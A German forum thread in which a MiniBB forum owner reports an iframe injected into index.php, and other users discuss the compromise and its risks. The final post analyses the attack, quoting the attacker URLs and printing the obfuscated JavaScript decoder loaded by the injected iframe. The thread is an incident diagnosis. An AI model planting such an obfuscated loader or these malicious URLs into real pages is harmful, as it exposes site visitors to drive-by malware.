MiniBB-Bug oder unsicherer Server
rabby
- sonstiges
0 Sven Rautenberg0 rabby
0 eddi
hallo,
habe soeben feststellen müssen, dass jemand, k.a. wie, in dem testforum http://www.aktuell-online.info/forum/ linksoben (im mozilla sieht mans so; ansonsten in der source die erste zeile...) einen link eingeschleußt hat.
hat da irgendwer einen bug von minibb ausgenutzt oder wie würde diese datei geändert?
danke
für hilfeund hinweise.
Moin!
habe soeben feststellen müssen, dass jemand, k.a. wie, in dem testforum http://www.aktuell-online.info/forum/ linksoben (im mozilla sieht mans so; ansonsten in der source die erste zeile...) einen link eingeschleußt hat.
Es ist kein Link, es ist ein IFrame.
hat da irgendwer einen bug von minibb ausgenutzt oder wie würde diese datei geändert?
Kann man nicht sagen, es steht kein Änderungsprotokoll dabei, aus dem das hervorgeht.
- Sven Rautenberg
Es ist kein Link, es ist ein IFrame.
stimmt.
in der index.php wurde einfach zu beginn der datei sowas hinzugefügt.
hab nun wieder die originaldatei hochgeladen.
in der hoffnung, dass das nicht nochmal passiert, werd ich mal abwarten.
schönen tag noch
Moin!
Es ist kein Link, es ist ein IFrame.
stimmt.
in der index.php wurde einfach zu beginn der datei sowas hinzugefügt.
hab nun wieder die originaldatei hochgeladen.
in der hoffnung, dass das nicht nochmal passiert, werd ich mal abwarten.
Scheint nichts geholfen zu haben - das IFrame sehe ich immer noch.
Aktualisiere deine Version von MiniBB, informiere den Hersteller, schalte das Forum vorübergehend ab, oder nimm eine andere Software! So wahnsinnig viel genutzt wird das Forum ja nicht.
Mit Sicherheit hängen die zwei Posts vom 30.4. und 7.5. (warum ist bei dir eigentlich schon Montag? Mal Serveruhr richtig stellen!) damit zusammen.
- Sven Rautenberg
Scheint nichts geholfen zu haben - das IFrame sehe ich immer noch.
mir ist noch was dazwischen gekommen, sodass ich noch nicht dazukam, es upzuloaden.
Aktualisiere deine Version von MiniBB, informiere den Hersteller, schalte das Forum vorübergehend ab, oder nimm eine andere Software! So wahnsinnig viel genutzt wird das Forum ja nicht.
ehrlichgesagt ist das meine geringere sorge. bläd wäre es nur, wenn jemand die ftp daten hätte o.ä. ...
hab zwar keine unsicheren pws; aber sowas verunsichert dann doch irgendwie.
Moin!
Scheint nichts geholfen zu haben - das IFrame sehe ich immer noch.
mir ist noch was dazwischen gekommen, sodass ich noch nicht dazukam, es upzuloaden.
Aktualisiere deine Version von MiniBB, informiere den Hersteller, schalte das Forum vorübergehend ab, oder nimm eine andere Software! So wahnsinnig viel genutzt wird das Forum ja nicht.
ehrlichgesagt ist das meine geringere sorge. bläd wäre es nur, wenn jemand die ftp daten hätte o.ä. ...
hab zwar keine unsicheren pws; aber sowas verunsichert dann doch irgendwie.
Dir ist es also egal, ob jemand in dein Forum Skripte einschleust, die beliebiges Unheil anrichten können? Die beispielsweise dein Admin-Passwort des Forums auslesen und weiterversenden können, oder in den Browsern deiner Besucher (diverse IE-Lücken sind ja aktuell bekannt geworden) Schadsoftware installieren etc.?
- Sven Rautenberg
Hallo,
die eingebundene Resource http://85.255.113.4/dl/adv448.php stammt aus der Ukraine und läd vom selben Server Javascriptcode nach (http://196.regvista.com/index.php?ref=vish)
function decrypt_p(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;
var t=Array(63,2,40,17,19,1,9,53,5,30,0,0,0,0,0,0,42,18,16,28,54,14,13,33,37,45,56,52,35,39,49,61,10,55,24,22,38,44,26,20,47,48,32,0,0,0,0,6,0,11,34,29,57,58,3,21,41,27,59,4,12,31,46,43,60,36,15,7,8,50,51,62,25,23,0);
for(j=Math.ceil(l/b);j>0;j--){
r='';
for(i=Math.min(l,b);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){
r+=String.fromCharCode(165^w&255);
w>>=8;s-=2
}
else{
s=6
}
}
document.write(r)
}
}decrypt_p("81")
Dieser wird, weil dank Status 302 gleich auf die nächst nicht mehr zu erreichende Resource (http://apjuydguldid92pp5upp5c77p.affrontgl.com/?a) verwiesen wird, nicht ausgeführt. Ich würde vermuten, da versucht jemand einen Bug in MiniBB auszunutzen.
Gruß aus Berlin!
eddi